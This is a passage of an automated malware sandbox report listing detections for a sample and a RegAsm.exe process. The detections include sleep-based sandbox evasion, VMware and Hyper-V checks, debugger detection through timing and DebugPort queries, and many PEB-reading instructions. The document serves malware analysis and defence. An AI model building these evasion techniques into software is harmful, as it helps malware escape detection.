Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory allocated: 13C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory allocated: 2B70000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory allocated: 4B70000 memory reserve | memory write watch Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F6D1C0 rdtsc 10_2_02F6D1C0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API coverage: 0.7 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 7228 Thread sleep count: 158 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 7228 Thread sleep count: 317 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 7204 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 7172 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7284 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: wscript.exe, 00000000.00000003.1319553031.000002387C9BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
Source: wscript.exe, 00000000.00000003.1319553031.000002387C9BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: wscript.exe, 00000000.00000003.1318518516.000002387ED74000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$
Source: temp_executable.exe, 00000008.00000002.1314448331.0000000001002000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F6D1C0 rdtsc 10_2_02F6D1C0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_00417663 LdrLoadDll, 10_2_00417663
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FAF2F8 mov eax, dword ptr fs:[00000030h] 10_2_02FAF2F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EE92FF mov eax, dword ptr fs:[00000030h] 10_2_02EE92FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F002E1 mov eax, dword ptr fs:[00000030h] 10_2_02F002E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F002E1 mov eax, dword ptr fs:[00000030h] 10_2_02F002E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F002E1 mov eax, dword ptr fs:[00000030h] 10_2_02F002E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA12ED mov eax, dword ptr fs:[00000030h] 10_2_02FA12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA12ED mov eax, dword ptr fs:[00000030h] 10_2_02FA12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA12ED mov eax, dword ptr fs:[00000030h] 10_2_02FA12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA12ED mov eax, dword ptr fs:[00000030h] 10_2_02FA12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA12ED mov eax, dword ptr fs:[00000030h] 10_2_02FA12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA12ED mov eax, dword ptr fs:[00000030h] 10_2_02FA12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA12ED mov eax, dword ptr fs:[00000030h] 10_2_02FA12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA12ED mov eax, dword ptr fs:[00000030h] 10_2_02FA12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA12ED mov eax, dword ptr fs:[00000030h] 10_2_02FA12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA12ED mov eax, dword ptr fs:[00000030h] 10_2_02FA12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA12ED mov eax, dword ptr fs:[00000030h] 10_2_02FA12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA12ED mov eax, dword ptr fs:[00000030h] 10_2_02FA12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA12ED mov eax, dword ptr fs:[00000030h] 10_2_02FA12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA12ED mov eax, dword ptr fs:[00000030h] 10_2_02FA12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FC52E2 mov eax, dword ptr fs:[00000030h] 10_2_02FC52E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1F2D0 mov eax, dword ptr fs:[00000030h] 10_2_02F1F2D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1F2D0 mov eax, dword ptr fs:[00000030h] 10_2_02F1F2D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF92C5 mov eax, dword ptr fs:[00000030h] 10_2_02EF92C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF92C5 mov eax, dword ptr fs:[00000030h] 10_2_02EF92C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EFA2C3 mov eax, dword ptr fs:[00000030h] 10_2_02EFA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EFA2C3 mov eax, dword ptr fs:[00000030h] 10_2_02EFA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EFA2C3 mov eax, dword ptr fs:[00000030h] 10_2_02EFA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EFA2C3 mov eax, dword ptr fs:[00000030h] 10_2_02EFA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EFA2C3 mov eax, dword ptr fs:[00000030h] 10_2_02EFA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1B2C0 mov eax, dword ptr fs:[00000030h] 10_2_02F1B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1B2C0 mov eax, dword ptr fs:[00000030h] 10_2_02F1B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1B2C0 mov eax, dword ptr fs:[00000030h] 10_2_02F1B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1B2C0 mov eax, dword ptr fs:[00000030h] 10_2_02F1B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1B2C0 mov eax, dword ptr fs:[00000030h] 10_2_02F1B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1B2C0 mov eax, dword ptr fs:[00000030h] 10_2_02F1B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1B2C0 mov eax, dword ptr fs:[00000030h] 10_2_02F1B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEB2D3 mov eax, dword ptr fs:[00000030h] 10_2_02EEB2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEB2D3 mov eax, dword ptr fs:[00000030h] 10_2_02EEB2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEB2D3 mov eax, dword ptr fs:[00000030h] 10_2_02EEB2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F792BC mov eax, dword ptr fs:[00000030h] 10_2_02F792BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F792BC mov eax, dword ptr fs:[00000030h] 10_2_02F792BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F792BC mov ecx, dword ptr fs:[00000030h] 10_2_02F792BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F792BC mov ecx, dword ptr fs:[00000030h] 10_2_02F792BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F002A0 mov eax, dword ptr fs:[00000030h] 10_2_02F002A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F002A0 mov eax, dword ptr fs:[00000030h] 10_2_02F002A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F052A0 mov eax, dword ptr fs:[00000030h] 10_2_02F052A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F052A0 mov eax, dword ptr fs:[00000030h] 10_2_02F052A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F052A0 mov eax, dword ptr fs:[00000030h] 10_2_02F052A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F052A0 mov eax, dword ptr fs:[00000030h] 10_2_02F052A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F872A0 mov eax, dword ptr fs:[00000030h] 10_2_02F872A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F872A0 mov eax, dword ptr fs:[00000030h] 10_2_02F872A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F862A0 mov eax, dword ptr fs:[00000030h] 10_2_02F862A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F862A0 mov ecx, dword ptr fs:[00000030h] 10_2_02F862A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F862A0 mov eax, dword ptr fs:[00000030h] 10_2_02F862A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F862A0 mov eax, dword ptr fs:[00000030h] 10_2_02F862A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F862A0 mov eax, dword ptr fs:[00000030h] 10_2_02F862A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F862A0 mov eax, dword ptr fs:[00000030h] 10_2_02F862A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB92A6 mov eax, dword ptr fs:[00000030h] 10_2_02FB92A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB92A6 mov eax, dword ptr fs:[00000030h] 10_2_02FB92A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB92A6 mov eax, dword ptr fs:[00000030h] 10_2_02FB92A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB92A6 mov eax, dword ptr fs:[00000030h] 10_2_02FB92A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F2329E mov eax, dword ptr fs:[00000030h] 10_2_02F2329E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F2329E mov eax, dword ptr fs:[00000030h] 10_2_02F2329E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F70283 mov eax, dword ptr fs:[00000030h] 10_2_02F70283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F70283 mov eax, dword ptr fs:[00000030h] 10_2_02F70283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F70283 mov eax, dword ptr fs:[00000030h] 10_2_02F70283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F2E284 mov eax, dword ptr fs:[00000030h] 10_2_02F2E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F2E284 mov eax, dword ptr fs:[00000030h] 10_2_02F2E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FC5283 mov eax, dword ptr fs:[00000030h] 10_2_02FC5283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F31270 mov eax, dword ptr fs:[00000030h] 10_2_02F31270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F31270 mov eax, dword ptr fs:[00000030h] 10_2_02F31270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EE826B mov eax, dword ptr fs:[00000030h] 10_2_02EE826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F19274 mov eax, dword ptr fs:[00000030h] 10_2_02F19274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h] 10_2_02FA0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h] 10_2_02FA0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h] 10_2_02FA0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h] 10_2_02FA0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h] 10_2_02FA0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h] 10_2_02FA0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h] 10_2_02FA0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h] 10_2_02FA0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h] 10_2_02FA0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h] 10_2_02FA0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h] 10_2_02FA0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h] 10_2_02FA0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF4260 mov eax, dword ptr fs:[00000030h] 10_2_02EF4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF4260 mov eax, dword ptr fs:[00000030h] 10_2_02EF4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF4260 mov eax, dword ptr fs:[00000030h] 10_2_02EF4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FBD26B mov eax, dword ptr fs:[00000030h] 10_2_02FBD26B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FBD26B mov eax, dword ptr fs:[00000030h] 10_2_02FBD26B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7D250 mov ecx, dword ptr fs:[00000030h] 10_2_02F7D250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FAB256 mov eax, dword ptr fs:[00000030h] 10_2_02FAB256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FAB256 mov eax, dword ptr fs:[00000030h] 10_2_02FAB256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EE9240 mov eax, dword ptr fs:[00000030h] 10_2_02EE9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EE9240 mov eax, dword ptr fs:[00000030h] 10_2_02EE9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F78243 mov eax, dword ptr fs:[00000030h] 10_2_02F78243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F78243 mov ecx, dword ptr fs:[00000030h] 10_2_02F78243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF6259 mov eax, dword ptr fs:[00000030h] 10_2_02EF6259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEA250 mov eax, dword ptr fs:[00000030h] 10_2_02EEA250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F2724D mov eax, dword ptr fs:[00000030h] 10_2_02F2724D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EE823B mov eax, dword ptr fs:[00000030h] 10_2_02EE823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FC5227 mov eax, dword ptr fs:[00000030h] 10_2_02FC5227
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F27208 mov eax, dword ptr fs:[00000030h] 10_2_02F27208
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F27208 mov eax, dword ptr fs:[00000030h] 10_2_02F27208
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FC53FC mov eax, dword ptr fs:[00000030h] 10_2_02FC53FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F0E3F0 mov eax, dword ptr fs:[00000030h] 10_2_02F0E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F0E3F0 mov eax, dword ptr fs:[00000030h] 10_2_02F0E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F0E3F0 mov eax, dword ptr fs:[00000030h] 10_2_02F0E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F263FF mov eax, dword ptr fs:[00000030h] 10_2_02F263FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F003E9 mov eax, dword ptr fs:[00000030h] 10_2_02F003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F003E9 mov eax, dword ptr fs:[00000030h] 10_2_02F003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F003E9 mov eax, dword ptr fs:[00000030h] 10_2_02F003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F003E9 mov eax, dword ptr fs:[00000030h] 10_2_02F003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F003E9 mov eax, dword ptr fs:[00000030h] 10_2_02F003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F003E9 mov eax, dword ptr fs:[00000030h] 10_2_02F003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F003E9 mov eax, dword ptr fs:[00000030h] 10_2_02F003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F003E9 mov eax, dword ptr fs:[00000030h] 10_2_02F003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FAF3E6 mov eax, dword ptr fs:[00000030h] 10_2_02FAF3E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FAB3D0 mov ecx, dword ptr fs:[00000030h] 10_2_02FAB3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EFA3C0 mov eax, dword ptr fs:[00000030h] 10_2_02EFA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EFA3C0 mov eax, dword ptr fs:[00000030h] 10_2_02EFA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EFA3C0 mov eax, dword ptr fs:[00000030h] 10_2_02EFA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EFA3C0 mov eax, dword ptr fs:[00000030h] 10_2_02EFA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EFA3C0 mov eax, dword ptr fs:[00000030h] 10_2_02EFA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EFA3C0 mov eax, dword ptr fs:[00000030h] 10_2_02EFA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF83C0 mov eax, dword ptr fs:[00000030h] 10_2_02EF83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF83C0 mov eax, dword ptr fs:[00000030h] 10_2_02EF83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF83C0 mov eax, dword ptr fs:[00000030h] 10_2_02EF83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF83C0 mov eax, dword ptr fs:[00000030h] 10_2_02EF83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FAC3CD mov eax, dword ptr fs:[00000030h] 10_2_02FAC3CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F763C0 mov eax, dword ptr fs:[00000030h] 10_2_02F763C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F233A0 mov eax, dword ptr fs:[00000030h] 10_2_02F233A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F233A0 mov eax, dword ptr fs:[00000030h] 10_2_02F233A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F133A5 mov eax, dword ptr fs:[00000030h] 10_2_02F133A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FC539D mov eax, dword ptr fs:[00000030h] 10_2_02FC539D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEE388 mov eax, dword ptr fs:[00000030h] 10_2_02EEE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEE388 mov eax, dword ptr fs:[00000030h] 10_2_02EEE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEE388 mov eax, dword ptr fs:[00000030h] 10_2_02EEE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F4739A mov eax, dword ptr fs:[00000030h] 10_2_02F4739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F4739A mov eax, dword ptr fs:[00000030h] 10_2_02F4739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EE8397 mov eax, dword ptr fs:[00000030h] 10_2_02EE8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EE8397 mov eax, dword ptr fs:[00000030h] 10_2_02EE8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EE8397 mov eax, dword ptr fs:[00000030h] 10_2_02EE8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1438F mov eax, dword ptr fs:[00000030h] 10_2_02F1438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1438F mov eax, dword ptr fs:[00000030h] 10_2_02F1438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F9437C mov eax, dword ptr fs:[00000030h] 10_2_02F9437C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FAF367 mov eax, dword ptr fs:[00000030h] 10_2_02FAF367
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF7370 mov eax, dword ptr fs:[00000030h] 10_2_02EF7370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF7370 mov eax, dword ptr fs:[00000030h] 10_2_02EF7370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF7370 mov eax, dword ptr fs:[00000030h] 10_2_02EF7370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EED34C mov eax, dword ptr fs:[00000030h] 10_2_02EED34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EED34C mov eax, dword ptr fs:[00000030h] 10_2_02EED34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FBA352 mov eax, dword ptr fs:[00000030h] 10_2_02FBA352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7035C mov eax, dword ptr fs:[00000030h] 10_2_02F7035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7035C mov eax, dword ptr fs:[00000030h] 10_2_02F7035C
